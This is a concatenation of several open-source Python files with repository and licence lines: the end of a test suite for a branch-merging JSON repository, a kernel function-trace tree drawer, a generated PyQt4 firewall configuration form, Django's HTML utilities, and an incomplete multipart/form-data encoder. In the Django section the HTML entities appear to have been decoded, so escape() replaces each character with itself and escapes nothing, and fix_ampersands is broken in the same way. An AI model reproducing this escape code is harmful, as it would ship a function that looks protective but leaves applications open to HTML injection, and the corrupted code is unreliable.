f1, f2, f3 = j({'a': 1}), j({'b': 2}), j({'c': 3})
repoman.save_file('f1', f1, 'b1')
repoman.save_file('f2', f2, 'b1')
repoman.save_file('x/f3', f3, 'b1')
repoman.save_file('f4', '{}', 'b1')
repoman.delete_file('f4', 'b1')
self.assertTrue(repoman.has_branch('b1'))
self.assertTrue(repoman.has_branch('master'))
self.assertEqual([], repoman.list_files_for_branch('master'))
self.assertTrue(repoman.publish_branch('b1'))
self.assertItemsEqual(['f1', 'f2', 'x/f3'],
repoman.list_files_for_branch('master'))
self.assertEqual([f1, f2, f3],
[repoman.file_contents_for_branch(x, 'b1')
for x in ('f1', 'f2', 'x/f3')])
self.assertEqual([f1, f2, f3],
[repoman.file_contents_for_branch(x, 'master')
for x in ('f1', 'f2', 'x/f3')])
# Only one published revision
self.assertEqual(len(repoman.get_published_revisions()), 1)
# 6 checkpoints, 1 per operation (5) + 1 for the original state.
self.assertEqual(len(repoman.get_branch_checkpoints('b1')), 6)
def test_sequential_publishes(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1, f2 = j({'a': 1}), j({'b': 2})
repoman.save_file('f1', f1, 'b1')
repoman.save_file('x/f2', f2, 'b1')
repoman.publish_branch('b1')
repoman.delete_branch('b1')
# f1 is modified in branch b2
f1 = j({'a': 3})
repoman.save_file('f1', f1, 'b2')
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual([f1, f2],
[repoman.file_contents_for_branch(x, 'master')
for x in ('f1', 'x/f2')])
self.assertEqual(len(repoman.get_published_revisions()), 2)
def test_two_interleaved_publishes_1(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1, f2 = j({'a': 1}), j({'b': 2})
repoman.save_file('f1', f1, 'b1')
repoman.save_file('x/f2', f2, 'b1')
# branch b2 modifies the same files concurrently
f1, f2 = j({'c': 3}), j({'d': 4})
repoman.save_file('f1', f1, 'b2')
repoman.save_file('x/f2', f2, 'b2')
# both publish their changes, but the automerge should solve conflicts
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual(j({'a': 1, 'c': 3}),
repoman.file_contents_for_branch('f1', 'master'))
self.assertEqual(j({'b': 2, 'd': 4}),
repoman.file_contents_for_branch('x/f2', 'master'))
self.assertEqual(len(repoman.get_published_revisions()), 2)
def test_two_interleaved_publishes_2(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1 = j({'a': 1, 'c': 3})
repoman.save_file('f1', f1, 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# b1 adds x/f2.
f2 = j({'b': 2})
repoman.save_file('x/f2', f2, 'b1')
# branch b2 adds a file with the same name but different content
f2 = j({'a': 2, 'c': {'d': 1}})
repoman.save_file('x/f2', f2, 'b2')
repoman.delete_file('f1', 'b2')
# both publish their changes, but the automerge should solve conflicts
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual(j({'a': 2, 'b': 2, 'c': {'d': 1}}),
repoman.file_contents_for_branch('x/f2', 'master'))
self.assertEqual(len(repoman.get_published_revisions()), 3)
@unittest.skip('Broken, TODO check') # TODO
def test_two_interleaved_publishes_3(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
f1 = j({'a': 1, 'c': 3, 'd': 4, 'e': 5})
repoman.save_file('f1', f1, 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# b1 heavily edits f1
repoman.save_file('f1', j({'b': 2, 'e': 5}), 'b1')
# this case is VERY tricky. branch 2 renames f1 to f2 and changes
# it a bit. The merge algorithm detects the rename and the merged
# output ends up containing all b1 changes + all b2 changes, and the
# file is stored under the name given by branch2
repoman.delete_file('f1', 'b2')
repoman.save_file('f2', j({'a': 1, 'c': 3, 'd': 4, 'e': 6}), 'b2')
# both publish their changes, but the automerge should solve conflicts
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
self.assertEqual(j({'b': 2, 'e': 6}),
repoman.file_contents_for_branch('f2', 'master'))
self.assertEqual(len(repoman.get_published_revisions()), 3)
def test_modify_delete(self):
# Although this is usually treated as a conflict, here we just keep the
# modified version and ignore the delete.
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
repoman.save_file('f1', j({'a': 1}), 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# b1 deletes f1 and b2 modifies it.
repoman.delete_file('f1', 'b1')
repoman.save_file('f1', j({'a': 2, 'c': 3}), 'b2')
self.assertTrue(repoman.publish_branch('b1'))
self.assertTrue(repoman.publish_branch('b2'))
# master has f1.
self.assertEqual(['f1'], repoman.list_files_for_branch('master'))
self.assertEqual(j({'a': 2, 'c': 3}),
repoman.file_contents_for_branch('f1', 'master'))
def test_unresolved_conflicts_both_modify(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
repoman.save_file('f1', j({'a': 1}), 'b1')
self.assertTrue(repoman.publish_branch('b1'))
repoman.delete_branch('b1')
# both branches update the same key of the same file with different
# values. This conflict must be manually resolved
repoman.save_file('f1', j({'a': 2}), 'b1')
repoman.save_file('f1', j({'a': 3}), 'b2')
self.assertTrue(repoman.publish_branch('b1'))
self.assertFalse(repoman.publish_branch('b2'))
# the file appears as published by b1 in the master branch
self.assertEqual(j({'a': 2}),
repoman.file_contents_for_branch('f1', 'master'))
# the file in b2 has an unresolved conflict
self.assertIn('__CONFLICT',
j(repoman.file_contents_for_branch('f1', 'b2')))
# b2 solves the conflict, saves again and forces the publish
repoman.save_file('f1', j({'a': 3}), 'b2')
self.assertTrue(repoman.publish_branch('b2', force=True))
self.assertEqual(j({'a': 3}),
repoman.file_contents_for_branch('f1', 'master'))
def test_unresolved_conflicts_both_add(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
# both add the same file with a conflicting key
repoman.save_file('f1', j({'a': 1}), 'b1')
repoman.save_file('f1', j({'a': 2}), 'b2')
self.assertTrue(repoman.publish_branch('b1'))
self.assertFalse(repoman.publish_branch('b2'))
# the file appears as published by b1 in the master branch
self.assertEqual(j({'a': 1}),
repoman.file_contents_for_branch('f1', 'master'))
# the file in b2 has an unresolved conflict
self.assertIn('__CONFLICT',
j(repoman.file_contents_for_branch('f1', 'b2')))
| bsd-3-clause |
lmajewski/linux-samsung-thermal | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <[email protected]>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
GNS3/gns3-legacy | src/GNS3/Ui/ConfigurationPages/Form_PIXPage.py | 3 | 8636 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './ConfigurationPages/Form_PIXPage.ui'
#
# Created: Mon Sep 9 21:29:23 2013
# by: PyQt4 UI code generator 4.8.6
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_PIXPage(object):
def setupUi(self, PIXPage):
PIXPage.setObjectName(_fromUtf8("PIXPage"))
PIXPage.resize(419, 453)
PIXPage.setWindowTitle(QtGui.QApplication.translate("PIXPage", "Firewall configuration", None, QtGui.QApplication.UnicodeUTF8))
self.gridLayout = QtGui.QGridLayout(PIXPage)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label_17 = QtGui.QLabel(PIXPage)
self.label_17.setText(QtGui.QApplication.translate("PIXPage", "PIX Image:", None, QtGui.QApplication.UnicodeUTF8))
self.label_17.setObjectName(_fromUtf8("label_17"))
self.gridLayout.addWidget(self.label_17, 0, 0, 1, 1)
self.lineEditImage = QtGui.QLineEdit(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditImage.sizePolicy().hasHeightForWidth())
self.lineEditImage.setSizePolicy(sizePolicy)
self.lineEditImage.setObjectName(_fromUtf8("lineEditImage"))
self.gridLayout.addWidget(self.lineEditImage, 0, 1, 1, 1)
self.pushButtonImageBrowser = QtGui.QPushButton(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButtonImageBrowser.sizePolicy().hasHeightForWidth())
self.pushButtonImageBrowser.setSizePolicy(sizePolicy)
self.pushButtonImageBrowser.setMaximumSize(QtCore.QSize(31, 27))
self.pushButtonImageBrowser.setText(QtGui.QApplication.translate("PIXPage", "...", None, QtGui.QApplication.UnicodeUTF8))
self.pushButtonImageBrowser.setObjectName(_fromUtf8("pushButtonImageBrowser"))
self.gridLayout.addWidget(self.pushButtonImageBrowser, 0, 2, 1, 1)
self.label_24 = QtGui.QLabel(PIXPage)
self.label_24.setText(QtGui.QApplication.translate("PIXPage", "RAM:", None, QtGui.QApplication.UnicodeUTF8))
self.label_24.setObjectName(_fromUtf8("label_24"))
self.gridLayout.addWidget(self.label_24, 1, 0, 1, 1)
self.spinBoxRamSize = QtGui.QSpinBox(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.spinBoxRamSize.sizePolicy().hasHeightForWidth())
self.spinBoxRamSize.setSizePolicy(sizePolicy)
self.spinBoxRamSize.setSuffix(QtGui.QApplication.translate("PIXPage", " MiB", None, QtGui.QApplication.UnicodeUTF8))
self.spinBoxRamSize.setMaximum(100000)
self.spinBoxRamSize.setSingleStep(4)
self.spinBoxRamSize.setProperty("value", 128)
self.spinBoxRamSize.setObjectName(_fromUtf8("spinBoxRamSize"))
self.gridLayout.addWidget(self.spinBoxRamSize, 1, 1, 1, 2)
self.label_37 = QtGui.QLabel(PIXPage)
self.label_37.setText(QtGui.QApplication.translate("PIXPage", "Number of NICs:", None, QtGui.QApplication.UnicodeUTF8))
self.label_37.setObjectName(_fromUtf8("label_37"))
self.gridLayout.addWidget(self.label_37, 2, 0, 1, 1)
self.spinBoxNics = QtGui.QSpinBox(PIXPage)
self.spinBoxNics.setMinimum(0)
self.spinBoxNics.setMaximum(100000)
self.spinBoxNics.setSingleStep(1)
self.spinBoxNics.setProperty("value", 6)
self.spinBoxNics.setObjectName(_fromUtf8("spinBoxNics"))
self.gridLayout.addWidget(self.spinBoxNics, 2, 1, 1, 2)
self.label_26 = QtGui.QLabel(PIXPage)
self.label_26.setText(QtGui.QApplication.translate("PIXPage", "NIC model:", None, QtGui.QApplication.UnicodeUTF8))
self.label_26.setObjectName(_fromUtf8("label_26"))
self.gridLayout.addWidget(self.label_26, 3, 0, 1, 1)
self.comboBoxNIC = QtGui.QComboBox(PIXPage)
self.comboBoxNIC.setEnabled(True)
self.comboBoxNIC.setObjectName(_fromUtf8("comboBoxNIC"))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(0, QtGui.QApplication.translate("PIXPage", "ne2k_pci", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(1, QtGui.QApplication.translate("PIXPage", "i82551", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(2, QtGui.QApplication.translate("PIXPage", "i82557b", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(3, QtGui.QApplication.translate("PIXPage", "i82559er", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(4, QtGui.QApplication.translate("PIXPage", "rtl8139", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(5, QtGui.QApplication.translate("PIXPage", "e1000", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(6, QtGui.QApplication.translate("PIXPage", "pcnet", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(7, QtGui.QApplication.translate("PIXPage", "virtio", None, QtGui.QApplication.UnicodeUTF8))
self.comboBoxNIC.addItem(_fromUtf8(""))
self.comboBoxNIC.setItemText(8, QtGui.QApplication.translate("PIXPage", "virtio-net-pci", None, QtGui.QApplication.UnicodeUTF8))
self.gridLayout.addWidget(self.comboBoxNIC, 3, 1, 1, 2)
self.label_8 = QtGui.QLabel(PIXPage)
self.label_8.setText(QtGui.QApplication.translate("PIXPage", "Qemu Options:", None, QtGui.QApplication.UnicodeUTF8))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.gridLayout.addWidget(self.label_8, 4, 0, 1, 1)
self.lineEditOptions = QtGui.QLineEdit(PIXPage)
self.lineEditOptions.setEnabled(True)
self.lineEditOptions.setObjectName(_fromUtf8("lineEditOptions"))
self.gridLayout.addWidget(self.lineEditOptions, 4, 1, 1, 2)
self.label_20 = QtGui.QLabel(PIXPage)
self.label_20.setText(QtGui.QApplication.translate("PIXPage", "Key:", None, QtGui.QApplication.UnicodeUTF8))
self.label_20.setObjectName(_fromUtf8("label_20"))
self.gridLayout.addWidget(self.label_20, 5, 0, 1, 1)
self.lineEditKey = QtGui.QLineEdit(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditKey.sizePolicy().hasHeightForWidth())
self.lineEditKey.setSizePolicy(sizePolicy)
self.lineEditKey.setObjectName(_fromUtf8("lineEditKey"))
self.gridLayout.addWidget(self.lineEditKey, 5, 1, 1, 2)
self.label_21 = QtGui.QLabel(PIXPage)
self.label_21.setText(QtGui.QApplication.translate("PIXPage", "Serial:", None, QtGui.QApplication.UnicodeUTF8))
self.label_21.setObjectName(_fromUtf8("label_21"))
self.gridLayout.addWidget(self.label_21, 6, 0, 1, 1)
self.lineEditSerial = QtGui.QLineEdit(PIXPage)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditSerial.sizePolicy().hasHeightForWidth())
self.lineEditSerial.setSizePolicy(sizePolicy)
self.lineEditSerial.setObjectName(_fromUtf8("lineEditSerial"))
self.gridLayout.addWidget(self.lineEditSerial, 6, 1, 1, 2)
spacerItem = QtGui.QSpacerItem(20, 281, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 7, 1, 1, 1)
self.retranslateUi(PIXPage)
self.comboBoxNIC.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(PIXPage)
def retranslateUi(self, PIXPage):
pass
| gpl-2.0 |
isaac-philip/loolu | common/django/utils/html.py | 116 | 7418 | """HTML utilities suitable for global use."""
import re
import string
from django.utils.safestring import SafeData, mark_safe
from django.utils.encoding import force_unicode
from django.utils.functional import allow_lazy
from django.utils.http import urlquote
# Configuration for urlize() function.
LEADING_PUNCTUATION = ['(', '<', '<']
TRAILING_PUNCTUATION = ['.', ',', ')', '>', '\n', '>']
# List of possible strings used for bullets in bulleted lists.
DOTS = ['·', '*', '\xe2\x80\xa2', '•', '•', '•']
unencoded_ampersands_re = re.compile(r'&(?!(\w+|#\d+);)')
word_split_re = re.compile(r'(\s+)')
punctuation_re = re.compile('^(?P<lead>(?:%s)*)(?P<middle>.*?)(?P<trail>(?:%s)*)$' % \
('|'.join([re.escape(x) for x in LEADING_PUNCTUATION]),
'|'.join([re.escape(x) for x in TRAILING_PUNCTUATION])))
simple_email_re = re.compile(r'^\S+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+$')
link_target_attribute_re = re.compile(r'(<a [^>]*?)target=[^\s>]+')
html_gunk_re = re.compile(r'(?:<br clear="all">|<i><\/i>|<b><\/b>|<em><\/em>|<strong><\/strong>|<\/?smallcaps>|<\/?uppercase>)', re.IGNORECASE)
hard_coded_bullets_re = re.compile(r'((?:<p>(?:%s).*?[a-zA-Z].*?</p>\s*)+)' % '|'.join([re.escape(x) for x in DOTS]), re.DOTALL)
trailing_empty_content_re = re.compile(r'(?:<p>(?: |\s|<br \/>)*?</p>\s*)+\Z')
del x # Temporary variable
def escape(html):
"""
Returns the given HTML with ampersands, quotes and angle brackets encoded.
"""
return mark_safe(force_unicode(html).replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", '''))
escape = allow_lazy(escape, unicode)
def conditional_escape(html):
"""
Similar to escape(), except that it doesn't operate on pre-escaped strings.
"""
if isinstance(html, SafeData):
return html
else:
return escape(html)
def linebreaks(value, autoescape=False):
"""Converts newlines into <p> and <br />s."""
value = re.sub(r'\r\n|\r|\n', '\n', force_unicode(value)) # normalize newlines
paras = re.split('\n{2,}', value)
if autoescape:
paras = [u'<p>%s</p>' % escape(p).replace('\n', '<br />') for p in paras]
else:
paras = [u'<p>%s</p>' % p.replace('\n', '<br />') for p in paras]
return u'\n\n'.join(paras)
linebreaks = allow_lazy(linebreaks, unicode)
def strip_tags(value):
"""Returns the given HTML with all tags stripped."""
return re.sub(r'<[^>]*?>', '', force_unicode(value))
strip_tags = allow_lazy(strip_tags)
def strip_spaces_between_tags(value):
"""Returns the given HTML with spaces between tags removed."""
return re.sub(r'>\s+<', '><', force_unicode(value))
strip_spaces_between_tags = allow_lazy(strip_spaces_between_tags, unicode)
def strip_entities(value):
"""Returns the given HTML with all entities (&something;) stripped."""
return re.sub(r'&(?:\w+|#\d+);', '', force_unicode(value))
strip_entities = allow_lazy(strip_entities, unicode)
def fix_ampersands(value):
"""Returns the given HTML with all unencoded ampersands encoded correctly."""
return unencoded_ampersands_re.sub('&', force_unicode(value))
fix_ampersands = allow_lazy(fix_ampersands, unicode)
def urlize(text, trim_url_limit=None, nofollow=False, autoescape=False):
"""
Converts any URLs in text into clickable links.
Works on http://, https://, www. links and links ending in .org, .net or
.com. Links can have trailing punctuation (periods, commas, close-parens)
and leading punctuation (opening parens) and it'll still do the right
thing.
If trim_url_limit is not None, the URLs in link text longer than this limit
will truncated to trim_url_limit-3 characters and appended with an elipsis.
If nofollow is True, the URLs in link text will get a rel="nofollow"
attribute.
If autoescape is True, the link text and URLs will get autoescaped.
"""
trim_url = lambda x, limit=trim_url_limit: limit is not None and (len(x) > limit and ('%s...' % x[:max(0, limit - 3)])) or x
safe_input = isinstance(text, SafeData)
words = word_split_re.split(force_unicode(text))
nofollow_attr = nofollow and ' rel="nofollow"' or ''
for i, word in enumerate(words):
match = None
if '.' in word or '@' in word or ':' in word:
match = punctuation_re.match(word)
if match:
lead, middle, trail = match.groups()
# Make URL we want to point to.
url = None
if middle.startswith('http://') or middle.startswith('https://'):
url = urlquote(middle, safe='/&=:;#?+*')
elif middle.startswith('www.') or ('@' not in middle and \
middle and middle[0] in string.ascii_letters + string.digits and \
(middle.endswith('.org') or middle.endswith('.net') or middle.endswith('.com'))):
url = urlquote('http://%s' % middle, safe='/&=:;#?+*')
elif '@' in middle and not ':' in middle and simple_email_re.match(middle):
url = 'mailto:%s' % middle
nofollow_attr = ''
# Make link.
if url:
trimmed = trim_url(middle)
if autoescape and not safe_input:
lead, trail = escape(lead), escape(trail)
url, trimmed = escape(url), escape(trimmed)
middle = '<a href="%s"%s>%s</a>' % (url, nofollow_attr, trimmed)
words[i] = mark_safe('%s%s%s' % (lead, middle, trail))
else:
if safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
elif safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
return u''.join(words)
urlize = allow_lazy(urlize, unicode)
def clean_html(text):
"""
Clean the given HTML. Specifically, do the following:
* Convert <b> and <i> to <strong> and <em>.
* Encode all ampersands correctly.
* Remove all "target" attributes from <a> tags.
* Remove extraneous HTML, such as presentational tags that open and
immediately close and <br clear="all">.
* Convert hard-coded bullets into HTML unordered lists.
* Remove stuff like "<p> </p>", but only if it's at the
bottom of the text.
"""
from django.utils.text import normalize_newlines
text = normalize_newlines(force_unicode(text))
text = re.sub(r'<(/?)\s*b\s*>', '<\\1strong>', text)
text = re.sub(r'<(/?)\s*i\s*>', '<\\1em>', text)
text = fix_ampersands(text)
# Remove all target="" attributes from <a> tags.
text = link_target_attribute_re.sub('\\1', text)
# Trim stupid HTML such as <br clear="all">.
text = html_gunk_re.sub('', text)
# Convert hard-coded bullets into HTML unordered lists.
def replace_p_tags(match):
s = match.group().replace('</p>', '</li>')
for d in DOTS:
s = s.replace('<p>%s' % d, '<li>')
return u'<ul>\n%s\n</ul>' % s
text = hard_coded_bullets_re.sub(replace_p_tags, text)
# Remove stuff like "<p> </p>", but only if it's at the bottom
# of the text.
text = trailing_empty_content_re.sub('', text)
return text
clean_html = allow_lazy(clean_html, unicode)
| mit |
mdornseif/huTools | huTools/http/poster_encode.py | 1 | 11992 | """multipart/form-data encoding module
This module provides functions that faciliate encoding name/value pairs
as multipart/form-data suitable for a HTTP POST or PUT request.
multipart/form-data is the standard way to upload files over HTTP"""
__all__ = ['gen_boundary', 'encode_and_quote', 'MultipartParam',
'encode_string', 'encode_file_header', 'get_body_size', 'get_headers',
'multipart_encode']
import mimetypes
import os
import re
import urllib
import uuid
def gen_boundary():
"""Returns a random string to use as the boundary for a message"""
return uuid.uuid4().hex
def encode_and_quote(data):
"""If ``data`` is unicode, return urllib.quote_plus(data.encode("utf-8"))
otherwise return urllib.quote_plus(data)"""
if data is None:
return None
if isinstance(data, unicode):
data = data.encode("utf-8")
return urllib.quote_plus(data)
def _strify(s):
"""If s is a unicode string, encode it to UTF-8 and return the results,
otherwise return str(s), or None if s is None"""
if s is None:
return None
if isinstance(s, unicode):
return s.encode("utf-8")
return str(s)
class MultipartParam(object):
"""Represents a single parameter in a multipart/form-data request
``name`` is the name of this parameter.
If ``value`` is set, it must be a string or unicode object to use as the
data for this parameter.
If ``filename`` is set, it is what to say that this parameter's filename
is. Note that this does not have to be the actual filename any local file.
If ``filetype`` is set, it is used as the Content-Type for this parameter.
If unset it defaults to "text/plain; charset=utf8"
If ``filesize`` is set, it specifies the length of the file ``fileobj``
If ``fileobj`` is set, it must be a file-like object that supports
.read().
Both ``value`` and ``fileobj`` must not be set, doing so will
raise a ValueError assertion.
If ``fileobj`` is set, and ``filesize`` is not specified, then
the file's size will be determined first by stat'ing ``fileobj``'s
file descriptor, and if that fails, by seeking to the end of the file,
recording the current position as the size, and then by seeking back to the
beginning of the file.
"""
def __init__(self, name, value=None, filename=None, filetype=None,
filesize=None, fileobj=None):
self.name = encode_and_quote(name)
self.value = _strify(value)
if filename is None:
self.filename = None
else:
if isinstance(filename, unicode):
# Encode with XML entities
self.filename = filename.encode("ascii", "xmlcharrefreplace")
else:
self.filename = str(filename)
self.filename = self.filename.encode("string_escape").\
replace('"', '\\"')
self.filetype = _strify(filetype)
self.filesize = filesize
self.fileobj = fileobj
if self.value is not None and self.fileobj is not None:
raise ValueError("Only one of value or fileobj may be specified")
if fileobj is not None and filesize is None:
# Try and determine the file size
try:
self.filesize = os.fstat(fileobj.fileno()).st_size
except (OSError, AttributeError):
try:
fileobj.seek(0, 2)
self.filesize = fileobj.tell()
fileobj.seek(0)
except:
raise ValueError("Could not determine filesize")
def __cmp__(self, other):
attrs = ['name', 'value', 'filename', 'filetype', 'filesize', 'fileobj']
myattrs = [getattr(self, a) for a in attrs]
oattrs = [getattr(other, a) for a in attrs]
return cmp(myattrs, oattrs)
@classmethod
def from_file(cls, paramname, filename):
"""Returns a new MultipartParam object constructed from the local
file at ``filename``.
``filesize`` is determined by os.path.getsize(``filename``)
``filetype`` is determined by mimetypes.guess_type(``filename``)[0]
``filename`` is set to os.path.basename(``filename``)
"""
return cls(paramname, filename=os.path.basename(filename),
filetype=mimetypes.guess_type(filename)[0],
filesize=os.path.getsize(filename),
fileobj=open(filename, "rb"))
@classmethod
def from_params(cls, params):
"""Returns a list of MultipartParam objects from a sequence of
name, value pairs, MultipartParam instances,
or from a mapping of names to values
The values may be strings or file objects."""
if hasattr(params, 'items'):
params = params.items()
retval = []
for item in params:
if isinstance(item, cls):
retval.append(item)
continue
name, value = item
if hasattr(value, 'read'):
# Looks like a file object
filename = getattr(value, 'name', None)
if filename is not None:
filetype = mimetypes.guess_type(filename)[0]
else:
filetype = None
retval.append(cls(name=name, filename=filename,
filetype=filetype, fileobj=value))
else:
retval.append(cls(name, value))
return retval
def encode_hdr(self, boundary):
"""Returns the header of the encoding of this parameter"""
boundary = encode_and_quote(boundary)
headers = ["--%s" % boundary]
if self.filename:
disposition = 'form-data; name="%s"; filename="%s"' % (self.name,
self.filename)
else:
disposition = 'form-data; name="%s"' % self.name
headers.append("Content-Disposition: %s" % disposition)
if self.filetype:
filetype = self.filetype
else:
filetype = "text/plain; charset=utf-8"
headers.append("Content-Type: %s" % filetype)
if self.filesize is not None:
headers.append("Content-Length: %i" % self.filesize)
else:
headers.append("Content-Length: %i" % len(self.value))
headers.append("")
headers.append("")
return "\r\n".join(headers)
def encode(self, boundary):
"""Returns the string encoding of this parameter"""
if self.value is None:
value = self.fileobj.read()
else:
value = self.value
if re.search("^--%s$" % re.escape(boundary), value, re.M):
raise ValueError("boundary found in encoded string")
return "%s%s\r\n" % (self.encode_hdr(boundary), value)
def iter_encode(self, boundary, blocksize=4096):
"""Yields the encoding of this parameter
If self.fileobj is set, then blocks of ``blocksize`` bytes are read and
yielded."""
if self.value is not None:
yield self.encode(boundary)
else:
yield self.encode_hdr(boundary)
last_block = ""
encoded_boundary = "--%s" % encode_and_quote(boundary)
boundary_exp = re.compile("^%s$" % re.escape(encoded_boundary),
re.M)
while True:
block = self.fileobj.read(blocksize)
if not block:
yield "\r\n"
break
last_block += block
if boundary_exp.search(last_block):
raise ValueError("boundary found in file data")
last_block = last_block[-len(encoded_boundary) - 2:]
yield block
def get_size(self, boundary):
"""Returns the size in bytes that this param will be when encoded
with the given boundary."""
if self.filesize is not None:
valuesize = self.filesize
else:
valuesize = len(self.value)
return len(self.encode_hdr(boundary)) + 2 + valuesize
def encode_string(boundary, name, value):
"""Returns ``name`` and ``value`` encoded as a multipart/form-data
variable. ``boundary`` is the boundary string used throughout
a single request to separate variables."""
return MultipartParam(name, value).encode(boundary)
def encode_file_header(boundary, paramname, filesize, filename=None,
filetype=None):
"""Returns the leading data for a multipart/form-data field that contains
file data.
``boundary`` is the boundary string used throughout a single request to
separate variables.
``paramname`` is the name of the variable in this request.
``filesize`` is the size of the file data.
``filename`` if specified is the filename to give to this field. This
